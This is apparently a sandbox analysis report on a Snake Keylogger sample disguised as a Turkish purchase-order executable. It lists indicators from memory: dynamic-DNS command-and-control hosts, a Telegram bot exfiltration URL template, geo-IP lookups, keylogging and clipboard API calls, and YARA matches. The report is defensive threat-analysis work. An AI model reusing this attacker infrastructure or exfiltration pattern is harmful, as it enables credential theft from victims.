Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000308F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ercolina-usa.com
Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000308F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.ercolina-usa.com
Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
  The four port-8081 HTTP endpoints (51.38.247.67/_send_.php, aborters.duckdns.org, anotherarmy.dns.army, varders.kozow.com) are present in the unpacked payload both in the parent's 0x37F0000 region and in the RegSvcs.exe image region at 0x402000; none of them was resolved or contacted during this run (the only DNS queries are the four listed above), so they are dormant indicators rather than observed C2. http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name is the standard .NET ClaimTypes.Name URI carried by the runtime and is not an indicator.
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003023000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000003014000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
                Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000301E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBDr
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3423549370.0000000002F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                Source: RegSvcs.exe, 00000002.00000002.3424896751.00000000041AD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3424896751.0000000004173000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: RegSvcs.exe, 00000002.00000002.3423549370.0000000003045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
                Source: RegSvcs.exe, 00000002.00000002.3423549370.000000000304F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBDr
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006C425A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006C4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006C4458
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006B0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006DCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                System Summary

                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe.37f0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000000.00000002.980924587.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.3421749821.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe PID: 6244, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 2400, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00653B4C
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980133727.0000000000705000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_80642332-5
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe, 00000000.00000002.980133727.0000000000705000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_04ac06ba-f
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_b8ce74a5-7
                Source: Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_0afa3d3b-5
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006B4021: CreateFileW,DeviceIoControl,CloseHandle
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0065E800
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0065FE40
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0065E060
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006D804A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00664140
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00672405
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00686522
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006D0665
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0068267E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00666843
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0067283A
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006889DF
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00668A0E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006D0AE2
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00686A94
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006AEB07
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006B8B13
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0067CD61
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00687006
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0066710E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00663190
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00651287
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006733C7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0067F419
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006716C4
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00665680
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006658C0
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_006778D3
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0067DBB5
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00671BB8
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00689D05
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_0067BFE6
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_00671FD0
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exe | Code function: 0_2_037E35F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_01255380
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125D2A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125C470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125C749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_012569A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_012529F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125E9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125CA20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_01259DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125CCF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_01256FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125BFD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125CFD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125C198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125F9B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_0125E9C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_01253E11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A681E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6D018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A67B88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A68FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A611A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6BDA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6BDB8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A68114
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A69D81
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A69D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A61191
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6DDE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A615E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A615F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6DDD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A681D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6B920
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A60D38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6D938
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6B911
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6F960
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6F970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A60D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6D948
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6D4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6D4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A638B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A60487
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A66480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6B488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A66490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A60498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A698E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A608F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A698F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6F4C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6F4D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6602A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6F031
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A66038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A60007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A63008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6D008
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A63460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A69460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_05A6B478
